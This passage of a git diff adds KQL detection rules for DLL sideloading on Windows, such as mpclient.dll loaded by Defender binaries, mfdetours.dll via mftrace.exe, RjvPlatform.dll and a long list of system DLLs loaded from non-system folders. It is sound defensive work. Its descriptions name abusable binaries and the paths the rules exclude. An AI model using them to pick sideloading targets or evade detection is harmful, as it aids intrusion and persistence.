+DeviceImageLoadEvents
+| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_mfdetours_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_mfdetours_dll_sideloading.kql
new file mode 100644
index 00000000..c6a92fed
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_mfdetours_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mfdetours.DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_mpclient_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_mpclient_dll_sideloading.kql
new file mode 100644
index 00000000..37e3c542
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_mpclient_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mpclient.DLL Sideloading
+// Author: Bhabesh Raj
+// Date: 2022-08-02
+// Level: high
+// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\mpclient.dll" and (InitiatingProcessFolderPath endswith "\\MpCmdRun.exe" or InitiatingProcessFolderPath endswith "\\NisSrv.exe")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_rcdll_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_rcdll_dll_sideloading.kql
new file mode 100644
index 00000000..a3f1ecd5
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_rcdll_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential Rcdll.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-13
+// Level: high
+// Description: Detects potential DLL sideloading of rcdll.dll
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\rcdll.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_default_location.kql b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_default_location.kql
new file mode 100644
index 00000000..96cf94db
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_default_location.kql
@@ -0,0 +1,10 @@
+// Title: Potential RjvPlatform.DLL Sideloading From Default Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: medium
+// Description: Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\SystemResetPlatform\\SystemResetPlatform.exe" and FolderPath =~ "C:\\$SysReset\\Framework\\Stack\\RjvPlatform.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_non_default_location.kql b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_non_default_location.kql
new file mode 100644
index 00000000..e8ce9673
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_rjvplatform_dll_sideloading_from_non_default_location.kql
@@ -0,0 +1,12 @@
+// Title: Potential RjvPlatform.DLL Sideloading From Non-Default Location
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: high
+// Description: Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where (InitiatingProcessFolderPath =~ "\\SystemResetPlatform.exe" and FolderPath endswith "\\RjvPlatform.dll") and (not(InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\SystemResetPlatform\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_roboform_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_roboform_dll_sideloading.kql
new file mode 100644
index 00000000..f0febe69
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_roboform_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential RoboForm.DLL Sideloading
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-14
+// Level: medium
+// Description: Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - If installed on a per-user level, the path would be located in "AppData\Local". Add additional filters to reflect this mode of installation
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\roboform.dll" or FolderPath endswith "\\roboform-x64.dll") and (not(((InitiatingProcessFolderPath endswith "\\robotaskbaricon.exe" or InitiatingProcessFolderPath endswith "\\robotaskbaricon-x64.exe") and (InitiatingProcessFolderPath startswith " C:\\Program Files (x86)\\Siber Systems\\AI RoboForm\\" or InitiatingProcessFolderPath startswith " C:\\Program Files\\Siber Systems\\AI RoboForm\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_shelldispatch_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_shelldispatch_dll_sideloading.kql
new file mode 100644
index 00000000..ec25ca4a
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_shelldispatch_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential ShellDispatch.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-20
+// Level: medium
+// Description: Detects potential DLL sideloading of "ShellDispatch.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Some installers may trigger some false positives
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ShellDispatch.dll" and (not(((FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\") or FolderPath contains ":\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_smadhook_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_smadhook_dll_sideloading.kql
new file mode 100644
index 00000000..6272a136
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_smadhook_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential SmadHook.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-01
+// Level: high
+// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_solidpdfcreator_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_solidpdfcreator_dll_sideloading.kql
new file mode 100644
index 00000000..5897c31d
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_solidpdfcreator_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential SolidPDFCreator.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-07
+// Level: medium
+// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql b/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql
new file mode 100644
index 00000000..515402aa
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql
@@ -0,0 +1,12 @@
+// Title: Potential System DLL Sideloading From Non System Locations
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-14
+// Level: high
+// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Legitimate applications loading their own versions of the DLLs mentioned in this rule
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certcli.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cfgmgr32.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\d3dx9_43.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sensapi.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\textshaping.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsdapi.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll") and (not(((FolderPath endswith "\\version.dll" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or (FolderPath endswith "\\d3dx9_43.dll" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\SyChpe32\\") or (FolderPath startswith "C:\\Windows\\Temp\\" and (InitiatingProcessFolderPath endswith "\\TiWorker.exe" or InitiatingProcessFolderPath endswith "\\wuaucltcore.exe") and (InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\arm64" or InitiatingProcessFolderPath startswith "C:\\Windows\\UUS\\arm64\\"))))) and (not((((FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl") and FolderPath startswith "C:\\Program Files\\Arsenal-Image-Mounter-") or FolderPath startswith "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (FolderPath endswith "\\PolicyManager.dll" and (FolderPath startswith "C:\\Program Files\\CheckPoint\\" or FolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CheckPoint\\" or 